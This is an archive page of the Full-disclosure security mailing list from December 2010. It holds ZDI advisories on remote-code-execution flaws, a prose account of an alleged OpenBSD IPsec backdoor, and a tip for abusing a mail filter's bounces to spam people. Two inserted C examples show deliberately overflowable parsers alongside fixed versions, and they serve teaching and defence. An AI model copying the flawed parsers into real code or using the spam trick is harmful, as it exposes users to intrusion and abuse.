Subject: Re: [Full-disclosure] How long was the twitter outage?

Oh noes, my email fell under the category of Common  Mild profanity.

Profanity content filtering is ridiculous, it's the kinda thing not even most 
parents would do on their kids computers.

I can understand filtering outgoing mail for profanity if it is a corporate 
company, but ffs lol.


[Full-disclosure] FW: Your email message was blocked

2010-12-23 Thread Thor (Hammer of God)
Classic.  Just send him an email with the link you want from whatever address 
you want, and you can spam people with the subject, including links.  :)

From: r...@bellaliant.ca [mailto:r...@bellaliant.ca]
Sent: Thursday, December 23, 2010 4:40 PM
To: Jimmy Jank the Wanksta
Subject: Your email message was blocked


The following email message was blocked by Bell Aliant Content Filtering Device:

   From:      t...@hammerofgod.com
   To:        r...@bellaliant.ca
   Subject:   You did this??? http://www.bloggersbase.com/humor/assbomber-harbinger-of-a-new-era-the-anal-jihad/
   Message:   B4d13ebf6.0001.0003.mml

Because it may contain unacceptable language, or inappropriate material.  
Please remove any unacceptable or inappropriate language and resend the message.

The blocked email will be automatically deleted after 5 days.

Content Rule: Policy Management (Inbound) : Block Common  Mild Profanity

r...@bellaliant.ca
6724 20:40:22.824 23 Dec 2010 - B4d13ebf6.0001.0003.mml
6724 20:40:22.824 Message From t...@hammerofgod.com, Return-path 
t...@hammerofgod.com, Recipients (1) -  r...@bellaliant.ca 

6724 20:40:22.824 Thread 1 Starting to unpack 
B4d13ebf6.0001.0003.mml
6724 20:40:22.824 MimeTags::Process tag Content-Language =  en-US
6724 20:40:22.824 MimeTags::Process tag Content-Type =  multipart/related; 
boundary=_004_58DB1B68E62B9F448DF1A276B0886DF16EBB501BEX2010hammerofg_; 
type=multipart/alternative
6724 20:40:22.824  MimeTags::Process tag Content-Type =  multipart/alternative; 
boundary=_000_58DB1B68E62B9F448DF1A276B0886DF16EBB501BEX2010hammerofg_
6724 20:40:22.824   MimeTags::Process tag Content-Type =  text/plain; 
charset=us-ascii
6724 20:40:22.824   MimeTags::Process tag Content-Transfer-Encoding =  
quoted-printable
6724 20:40:22.824   Encoding quoted-printable
6724 20:40:22.824   Quoted-Printable encoded section consumed 289 bytes - file 
D:\MailMarshal\Unpacking\T1\U2\Quoted-Printable.txt
6724 20:40:22.824   MimeTags::Process tag Content-Type =  text/html; 
charset=us-ascii
6724 20:40:22.824   MimeTags::Process tag Content-Transfer-Encoding =  
quoted-printable
6724 20:40:22.824   Encoding quoted-printable
6724 20:40:22.824   Quoted-Printable encoded section consumed 3365 bytes - file 
D:\MailMarshal\Unpacking\T1\U2\Quoted-Printable_1.txt
6724 20:40:22.824   UnpackComposite: End boundary found - unwinding
6724 20:40:22.824  MimeTags::Process tag Content-Type =  image/png; 
name=image001.png
6724 20:40:22.824  MimeTags::Process tag Content-Description =  image001.png
6724 20:40:22.824  MimeTags::Process tag Content-Disposition =  inline; 
filename=image001.png; size=1020; creation-date=Fri, 24 Dec 2010 00:40:12 
GMT; modification-date=Fri, 24 Dec 2010 00:40:12 GMT
6724 20:40:22.824  MimeTags::Process tag Content-ID =  
image001@01cba2c0.1104f830
6724 20:40:22.824  MimeTags::Process tag Content-Transfer-Encoding =  base64
6724 20:40:22.824  Encoding base64
6724 20:40:22.824  Base64 encoded section consumed 1396 bytes - file 
D:\MailMarshal\Unpacking\T1\U2\image001.png
6724 20:40:22.824  UnpackComposite: End boundary found - unwinding
6724 20:40:22.824 Type=MAIL,  size=8463,  
Name=B4d13ebf6.0001.0003.mml
6724 20:40:22.824   Type=MHDR,  size=2378,  Name=MsgHeader.txt
6724 20:40:22.824   Type=MBODY,  size=289,  Name=Quoted-Printable.txt
6724 20:40:22.824   Type=MBODY,  size=3242,  Name=Quoted-Printable_1.txt
6724 20:40:22.824   Type=PNG,  size=1020,  Name=image001.png
6724 20:40:22.824 1 user(s) match ruleset - Connection Policies
6724 20:40:22.824   0 user(s) match rule - NSP-SEC Email Rule - BA
6724 20:40:22.824   0 user(s) match rule - Delete Postmaster messages - BA
6724 20:40:22.824 1 user(s) match ruleset - Virus  Threats (Inbound)
6724 20:40:22.824   1 user(s) match rule - Block Virus
6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file 
B4d13ebf6.0001.0003.mml after 16 millisecs
6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file MsgHeader.txt 
after 0 millisecs
6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file 
Quoted-Printable.txt after 0 millisecs
6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file 
Quoted-Printable_1.txt after 0 millisecs
6724 20:40:22.840 virus scanner OK Sophos Anti-Virus file image001.png 
after 0 millisecs
6724 20:40:22.840 Name=U1\B4d13ebf6.0001.0003.mml (MAIL,8463) 
False
6724 20:40:22.840   Name=U2\MsgHeader.txt (MHDR,2378) False
6724 20:40:22.840   Name=U2\Quoted-Printable.txt (MBODY,289) False
6724 20:40:22.840   Name=U2\Quoted-Printable_1.txt (MBODY,3242) False
6724 20:40:22.840   Name=U2\image001.png (PNG,1020) False
6724 20:40:22.840   1 user(s) match rule - Block Known Threats
6724 20:40:22.840 Name=U1\B4d13ebf6.0001.0003.mml (MAIL,8463) 
False
6724 20:40:22.840   1 user(s) match rule - Block Known Virus Attachments
6724 20:40:22.840 

Re: [Full-disclosure] FW: Your email message was blocked

2010-12-23 Thread Cal Leeming [Simplicity Media Ltd]
LOL nicely spotted :D

On Fri, Dec 24, 2010 at 12:42 AM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

 Classic.  Just send him an email with the link you want from whatever
 address you want, and you can spam people with the subject, including links.
  :)


Re: [Full-disclosure] FW: Your email message was blocked

2010-12-23 Thread bk
You can also use it for deliverability testing against the anti-spam/anti-virus 
solution they use (check the headers).  It's loltastic.

On Dec 23, 2010, at 4:42 PM, Thor (Hammer of God) wrote:

 Classic.  Just send him an email with the link you want from whatever address 
 you want, and you can spam people with the subject, including links.  :)
  

Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-23 Thread Jeffrey Walton
However, with the debut of HTML 5, we're finding that video is being
offloaded to video and open codecs are being integrated into browsers.
Further, HTML 5's media capabilities are making flash cumbersome.

Not to resurrect a dead thread, but Microsoft's Silverlight applied a lot of
lessons from Flash: BlueHat v9: RIA Security: Real-World Lessons from Flash
and Silverlight, http://technet.microsoft.com/en-us/security/video/ee834904.
At least some folks are learning from Adobe's mistakes.

Jeff

On Sun, Dec 19, 2010 at 7:56 PM, Victor Rigo victor_r...@yahoo.com wrote:

 Concurred. No file format is as obnoxious as SWF.

 However, with the debut of HTML 5, we're finding that video is being
 offloaded to video and open codecs are being integrated into browsers.
 Further, HTML 5's media capabilities are making flash cumbersome.

 Try disabling flash extension on Firefox and enjoy real internet.

 Victor Rigo, CISSP
 Independent Computer Security Consultant
 Buenos Aires, AR
 +5411-4316-1901

 --- On *Sun, 12/19/10, Christian Sciberras uuf6...@gmail.com* wrote:


 From: Christian Sciberras uuf6...@gmail.com
 Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection
 again!
 To: Marsh Ray ma...@extendedsubset.com
 Cc: Victor Rigo victor_r...@yahoo.com,
 full-disclosure@lists.grok.org.uk
 Date: Sunday, December 19, 2010, 9:25 PM


 Personally, I kind of like Flash. It gives me a single kill switch for
 90% of the useless blinking crap and popups on the internet. Flash is a
 really appropriate name for exactly what I don't want to see on a web
 page. I hope it remains the platform of choice for those who develop
 such things. - Marsh Ray

 I'll keep using that quote till I die...




 On Sun, Dec 19, 2010 at 9:32 PM, Marsh Ray ma...@extendedsubset.com
  wrote:

 On 12/18/2010 05:30 PM, Victor Rigo wrote:
  Let's see, flash is:
 
  - Cross-platform
  - Cross-architecture
  - Has its own programming language
  - Is embedded on websites
  - Access to javascript to popup, local caches, etc.

 Not on my machine?

  It's not ineptness, it's what you get when you write software that can
  actually do stuff.

 Adobe comes from a time when you could write PC software without caring
 about security. Yeah, it was a heck of a lot easier to write just about
 anything back then because it was well and proper that anything could do
 anything.

 Nowadays, the first questions after hey our software could do this must
 be but should it do that? What else could someone leverage that new
 capability to do? How does it combine with every other feature in our
 app or even on the whole platform? What if somebody does it repeatedly
 in a tight loop? With pathological inputs? and so on. These questions
 take a long time to answer.

 So if a vendor is known for letting app developers do more stuff and
 not also known for letting users control what stuff gets done on their
 own machines then they are laggards, not leaders, in my view.

  If Java applets were still the hip thing, you'd see the same thing about
  that.

 There's undoubtedly some truth to that. But at the same time, it doesn't
 seem like a useful line of reasoning:

 * It's still not an argument for using Flash.

 * That Java plugins have had chronic security bugs doesn't mean that
 Flash doesn't suck too.

 * You seem to imply that you don't think that Adobe is likely to secure
 Flash any time soon. You're not saying Adobe will secure Flash in the
 next patch and then it will be great. But you listed all the great
 stuff it does, so I have to think you would have said something like
 that if you believed it. You may be making Flash look worse than it is.

 * It's basically an appeal to futility argument: no one could make a
 development platform and browser plugin that is significantly more
 secure (or does a better job of managing the security vs. doing stuff
 trade off) so therefore we should accept the status quo. That's why it's
 not useful: it gives no guidance on directions in which to improve.

 Personally, I kind of like Flash. It gives me a single kill switch for
 90% of the useless blinking crap and popups on the internet. Flash is a
 really appropriate name for exactly what I don't want to see on a web
 page. I hope it remains the platform of choice for those who develop
 such things.

 - Marsh


[Full-disclosure] ZDI-10-293: HP StorageWorks Storage Mirroring DoubleTake.exe Remote Code Execution Vulnerability

2010-12-23 Thread ZDI Disclosures
ZDI-10-293: HP StorageWorks Storage Mirroring DoubleTake.exe Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-293

December 23, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard StorageWorks

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10747.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of HP StorageWorks Storage Mirroring.
Authentication is not required to exploit this vulnerability.

The flaw exists within the DoubleTake.exe component which listens by
default on TCP port 6320. When handling an incoming packet the process
blindly trusts a user supplied length for a copy of arbitrary data into
a fixed-length buffer on the heap. A remote attacker can exploit this
vulnerability to execute arbitrary code under the context of the SYSTEM
user.

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02660122

-- Disclosure Timeline:
2010-09-27 - Vulnerability reported to vendor
2010-12-23 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* AbdulAziz Hariri of ThirdEyeTesters

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi
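
The flaw class described under Vulnerability Details (a sender-supplied length driving a copy into a fixed-length heap buffer), shown before and after the bounds checks as an added example that is not part of the ZDI advisory and is not HP code. The record layout, `REC_BUF_SIZE` and every function name are assumptions made for illustration; the advisory does not describe the DoubleTake.exe protocol.

```c
/* Added example. The 4-byte header (type, big-endian payload length) is a
 * hypothetical record format, not the DoubleTake.exe wire protocol. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REC_HDR_LEN  4u    /* 2-byte type + 2-byte payload length */
#define REC_BUF_SIZE 256u  /* the fixed-length heap buffer */

enum rec_status { REC_OK = 0, REC_TRUNCATED = -1, REC_TOO_LARGE = -2, REC_NOMEM = -3 };

struct record {
    uint16_t type;
    size_t   len;   /* bytes of payload stored in data */
    uint8_t *data;  /* REC_BUF_SIZE bytes, owned by the record */
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* BEFORE: the copy length is whatever the sender wrote in the header.
 * Neither the buffer size nor the number of bytes received is consulted. */
int parse_record_unsafe(const uint8_t *pkt, size_t pkt_len, struct record *out)
{
    (void)pkt_len;  /* never consulted: part of the flaw */
    out->data = malloc(REC_BUF_SIZE);
    if (out->data == NULL)
        return REC_NOMEM;
    out->type = be16(pkt);
    out->len = be16(pkt + 2);
    memcpy(out->data, pkt + REC_HDR_LEN, out->len);  /* overflows when len > REC_BUF_SIZE */
    return REC_OK;
}

/* AFTER: the claimed length is checked against the bytes actually received
 * and against the destination size before anything is allocated or copied. */
int parse_record_checked(const uint8_t *pkt, size_t pkt_len, struct record *out)
{
    size_t claimed;

    if (pkt == NULL || out == NULL || pkt_len < REC_HDR_LEN)
        return REC_TRUNCATED;
    claimed = be16(pkt + 2);
    if (claimed > pkt_len - REC_HDR_LEN)
        return REC_TRUNCATED;   /* header claims more than was received */
    if (claimed > REC_BUF_SIZE)
        return REC_TOO_LARGE;   /* would not fit the destination buffer */
    out->data = malloc(REC_BUF_SIZE);
    if (out->data == NULL)
        return REC_NOMEM;
    out->type = be16(pkt);
    out->len = claimed;
    memcpy(out->data, pkt + REC_HDR_LEN, claimed);
    return REC_OK;
}

/* Builds a constructed packet whose header claims `claimed` payload bytes
 * while `actual` bytes really follow; returns the checked parser's verdict. */
int check_constructed(uint16_t claimed, size_t actual)
{
    struct record rec = {0, 0, NULL};
    size_t pkt_len = REC_HDR_LEN + actual;
    uint8_t *pkt = malloc(pkt_len);
    int rc;

    if (pkt == NULL)
        return REC_NOMEM;
    pkt[0] = 0x00;
    pkt[1] = 0x01;                       /* type 1 (arbitrary) */
    pkt[2] = (uint8_t)(claimed >> 8);
    pkt[3] = (uint8_t)(claimed & 0xff);
    memset(pkt + REC_HDR_LEN, 'A', actual);
    rc = parse_record_checked(pkt, pkt_len, &rec);
    free(rec.data);
    free(pkt);
    return rc;
}

int main(void)
{
    /* Constructed, well-formed packet: both parsers accept it. */
    uint8_t ok_pkt[REC_HDR_LEN + 4] = {0, 1, 0, 4, 'p', 'i', 'n', 'g'};
    struct record rec = {0, 0, NULL};

    printf("unsafe parser, benign input:  %d\n",
           parse_record_unsafe(ok_pkt, sizeof ok_pkt, &rec));
    free(rec.data);
    printf("checked, well-formed 16/16:   %d\n", check_constructed(16, 16));
    printf("checked, claims 300 has 300:  %d\n", check_constructed(300, 300));
    printf("checked, claims 200 has 16:   %d\n", check_constructed(200, 16));
    return 0;
}
```

The two rejections are distinct on purpose: `REC_TRUNCATED` marks a header that lies about what was sent, `REC_TOO_LARGE` a record that arrived in full but exceeds the buffer, which is the case the advisory describes.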



[Full-disclosure] how i stopped worrying and loved the backdoor

2010-12-23 Thread Григорий Братислава
http://mickey.lucifier.net/b4ckd00r.html

how i stopped worrying and loved the backdoor

first of all i have to mention that netsec involvement was indirectly
one of the first financial successes of theo de raadt (later mr.t for
short) as the sale of 2500 cds through the EOUSA project (one for each
us-ins office in the country) brought openbsd to profitable state and
allowed mr.t to finance his living by means of the openbsd project.

but let us get back to our sheep (so to speak). as the disclosure
from herr gregory perry mentioned the parts involved were ipsec(4)
and crypto(4) framework and the gigabit ethernet stack. but see?
there is no such thing as gigabit ethernet stack. moreover back then
all the gigabit ethernet drivers came from freebsd. they were written
almost exclusively by bill paul who worked at columbia.edu. he himself
does not always disclose where he gets the docs or other tech info for
the driver development. drivers were ported to openbsd by jason@
(later mr.j). angelos@ (later mr.a) (who was contracted by netsec to
work on the crypto framework in openbsd) was a post-grad student at
upenn.edu at the time had contacts at columbia such as his friend and
fellow countryman ji@ who worked there. ji@ wrote the ipsec stack
initially (for bsd/os 2.0) in 1995. mr.a was porting it to openbsd. if
memory serves me right it was during the summer of 2002 that a
micro-hacking-session was held at columbia.edu. for less than one week
participating all the well known to us already mr.t and mr.j and mr.a
with an addition of drahn@ and yours truly. primary goal was to hack
on the OCF (crypto framework in openbsd). this does not affect crypto
algorithms you'd say right? but why try to plant subtle and enormously
complicated to develop side channels into math (encryption and
hashing) when it's way easier to just make the surrounding framework
misbehave and leak bits elsewhere? why not just semioccasionally send
an ipsec(4) packet with a plain text key appended to it? the receiver
will drop it as broken (check your ipsec stats!) and the sniffer in
the middle has the key! how would one do it? a little mbuf(9)
underflow combined with a little integer overflow. not that easy to
spot if more than just one line of code is involved. but this is just
a really crude example. leaking by just tiny bits over longer time
period would be even more subtle.

here are just some observations i had made during ipsec hacking years
later... some parts of ipsec code were to say at least strange
looking. in some places tiny loops were used where normally one would
use a function (such as memcpy(3)) or a bulk random data fetch instead
of fetching byte by byte. one has to know that to generate 16 bytes of
randomness by the random(4) driver (not the arc4 bit) it would take an
md5 algorithm run over 4096 bytes of the entropy pool. of course to
generate only one byte 15 bytes would have to be wasted. and thus
fetching N bytes one-by-one instead of filling a chunk would introduce
a measurable time delay. ain't these look like pieces of timing
weaknesses introduced in ipsec processing in order to make encrypted
data analysis easier? some code pieces created buffer underflows
leaving uninitialised data or in other words leaking information as
well. a common technique to hide changes was (and still is sometimes)
to shuffle the code around the file or between different files and
directories making actual code review a nightmare. but to be just lots
of those things had been since fixed (even by meself).

as the great ones teach us an essential part of any cryptographical
system is the random numbers generator. your humble servant was
involved in it too and right there in yer olde brooklyn. one breezy
spring night i wrote the openbsd random(4) driver that was based on
the linux driver written by theodore tso. and of course the output has
never been statistically analysed since the day i wrote it. no doubt i
ran some basic tests with help of mamasita (she's keen on math and
blintzi). later the arc4 part was added by david maziers (dm@) who was
also a friend of mr.a at the time and an openbsd developer. since then
a number of vulnerabilities were discovered in the arc4 algorithm and
subsequently the driver. most notably this potential key leak.

meanwhile in calgary... wasting no time netsec was secretly funnelling
security fixes through mr.t that he was committing stealth into
openbsd tree. (this i only knew years later when i was telling mr.t
over a beer about the funny people i met on a west-coast trip (see
later)). stealth means that purpose of the diffs was not disclosed
in the commit messages or the private openbsd development forums
except with a few trusted developers. it was a custom to hide
important development in the openbsd project at that time due to a
large netbsd-hate attitude (which also existed from the other side in
form of openbsd-hate attitude; just check out this netbsd diff and an
openbsd fix later; or a more recent 

[Full-disclosure] ZDI-10-294: Rocket U2 Uni RPC Service Remote Code Execution Vulnerability

2010-12-23 Thread ZDI Disclosures
ZDI-10-294: Rocket U2 Uni RPC Service Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-294

December 23, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Rocket

-- Affected Products:
Rocket U2

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6257.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
systems with vulnerable installations of multiple products from multiple
vendors that utilize the Uni RPC protocol. Authentication is not
required to exploit this vulnerability.

The specific flaw exists in the Uni RPC service (unirpcd.exe) which
listens by default on TCP port 31438. The unirpc32.dll module implements
an RPC protocol and is used by the Uni RPC service. While parsing a size
value from an RPC packet header, an integer can overflow and
consequently bypass a signed comparison. This controlled value is then
used as the number of bytes to receive into a static heap buffer. By
providing a specially crafted request, this heap buffer can overflow
leading to arbitrary code execution under the context of the SYSTEM
user.

-- Vendor Response:
Rocket states:
Rocket U2 states that this issue was first fixed in: UniVerse 10.3.9 and
UniData 7.2.8.   Recommended fix pack version: UniVerse 10.3.9 and above
or UniData 7.2.8 and above.
Please contact your software partner or u...@rs.com to obtain a fixed
version for UCC-676.

-- Disclosure Timeline:
2010-07-20 - Vulnerability reported to vendor
2010-12-23 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Ruben Santamarta

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi


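The flaw class described in the ZDI-10-294 advisory above (a size value that wraps negative and slips past a signed bounds check before being used as a receive length), shown as an added C example that is not part of the advisory and not Rocket's code. The header layout, `RECV_BUF_SIZE` and `HDR_PAD` are constructed assumptions, not the Uni RPC wire format.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define RECV_BUF_SIZE 0x2000u /* constructed: capacity of the fixed receive buffer */
#define HDR_PAD 24u           /* constructed: bytes the parser adds to the wire size */

/* Read a 32-bit big-endian size field (constructed layout). */
static uint32_t read_size_field(const uint8_t hdr[4]) {
    return ((uint32_t)hdr[0] << 24) | ((uint32_t)hdr[1] << 16) |
           ((uint32_t)hdr[2] << 8) | (uint32_t)hdr[3];
}

/* Flawed pattern: the adjusted size is compared as a signed int. A wire value
 * near INT32_MAX wraps negative, passes the test, and becomes a huge count
 * once converted for the receive call. Returns true if the packet is accepted;
 * *count is what would be passed as the receive length. */
bool flawed_check(const uint8_t hdr[4], size_t *count) {
    uint32_t wire = read_size_field(hdr);
    int32_t total = (int32_t)(wire + HDR_PAD); /* wraps on mainstream compilers */
    if (total > (int32_t)RECV_BUF_SIZE)
        return false;
    *count = (size_t)(uint32_t)total;
    return true;
}

/* Hardened pattern: stay unsigned and reject before doing any arithmetic. */
bool hardened_check(const uint8_t hdr[4], size_t *count) {
    uint32_t wire = read_size_field(hdr);
    if (wire > RECV_BUF_SIZE - HDR_PAD)
        return false;
    *count = (size_t)wire + HDR_PAD;
    return true;
}

int main(void) {
    const uint8_t wrap[4] = {0x7f, 0xff, 0xff, 0xf0}; /* constructed sample header */
    size_t n = 0;
    if (flawed_check(wrap, &n))
        printf("flawed check accepts, receive length %zu (buffer is %u)\n",
               n, RECV_BUF_SIZE);
    printf("hardened check %s\n", hardened_check(wrap, &n) ? "accepts" : "rejects");
    return 0;
}
```

The same comparison written with unsigned types and performed before the addition is the whole fix; compiler warnings such as `-Wsign-compare` and `-Wconversion` flag the flawed form during review.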

Re: [Full-disclosure] how i stopped worrying and loved the backdoor

2010-12-23 Thread Marsh Ray
On 12/23/2010 10:01 PM, Григорий Братислава wrote:
 http://mickey.lucifier.net/b4ckd00r.html

 how i stopped worrying and loved the backdoor

Note that much of that is backed up by CVS history. I'd seen some of 
those strange loops and bulk reformatting while reviewing the code 
commits last week.

For example, as he mentions in P2 the entropy pool extraction functions 
are implemented in such a way as to require 156 times more invocations 
of the MD5 block compression function than are necessary. This remains 
in the code today.

I even pointed some of this out the other day on this thread:
 http://marc.info/?l=openbsd-tech&m=129298665720095&w=2
Perhaps the reaction speaks louder than words.

I'd had mickey's name on my short list --
and had written 'not netsec' beside it. :-)

This is either something really interesting going on or the most 
spectacular trolling in net history.

- Marsh


Re: [Full-disclosure] how i stopped worrying and loved the backdoor

2010-12-23 Thread coderman
On Thu, Dec 23, 2010 at 10:00 PM, Marsh Ray ma...@extendedsubset.com wrote:
 ...
 how i stopped worrying and loved the backdoor

 Note that much of that is backed up by CVS history.
 ...
 For example, as he mentions in P2 the entropy pool extraction functions

intelligently constraining key space and / or leaking key bits is the
Right Way (tm) to do a backdoor.  it requires knowledge of the
particulars to execute and provides more robustness than a class break
/ full key leak.  i hear they've got clusters of key crackers for
searching reasonable spaces ;)

also, this may not be limited to entropy pool. it would make much
sense to combine elements of hardware accelerated crypto drivers with
entropy reduction or key leakage to target specific installations or
further obfuscate effects, as mentioned in the thread so linked.

(and you could be pretty precise with such key space degradation, if desired!)


 I even pointed some of this out the other day on this thread:
     http://marc.info/?l=openbsd-tech&m=129298665720095&w=2
 Perhaps the reaction speaks louder than words.

good entropy is hard, is the theme of that thread.

how do you measure entropy?  a few bytes and i've turned terabytes of
entropy into simple order.

the debian openssl weak key debacle underscores just how difficult and
obscure such technicalities are in the face of random human failures.
a well funded adversary with specific targets and significant skill
would enjoy plentiful opportunity and success.



Re: [Full-disclosure] how i stopped worrying and loved the backdoor

2010-12-23 Thread coderman
On Thu, Dec 23, 2010 at 10:57 PM, coderman coder...@gmail.com wrote:
 ...
 good entropy is hard, is the theme of that thread.

http://marc.info/?l=openbsd-tech&m=129304878126089&w=2

I agree that there's a good paper in this, I would love to see the
entropy added by the multi-consumer model quantified, or even an upper
bound placed on it.  In the past when I've given my talk on randomness
in the OpenBSD network stack, I've discussed this and I always ask for
someone to come forward with such a paper.

Unfortunately I don't get the impression that the amateur cryptographers
questioning the OpenBSD PRNG are qualified to produce such a paper (if
they were, they wouldn't be mailing here, they'd be submitting it to
real cryptographers for peer review)


perhaps musnt live will respond with a formal proof of entropy bound in obsd...



Re: [Full-disclosure] FW: Your email message was blocked

2010-12-23 Thread Georgi Guninski
On Fri, Dec 24, 2010 at 12:42:18AM +, Thor (Hammer of God) wrote:
 Classic.  Just send him an email with the link you want from whatever address 
 you want, and you can spam people with the subject, including links.  :)


I got one bounce too for the common word for practicing the art of
non-platonic love...

Btw, check for
Expression: _ Triggered 1 times weighting 5^M
(near the end of the bounce)

Wouldn't the underscores trigger the other spoofed content filter?
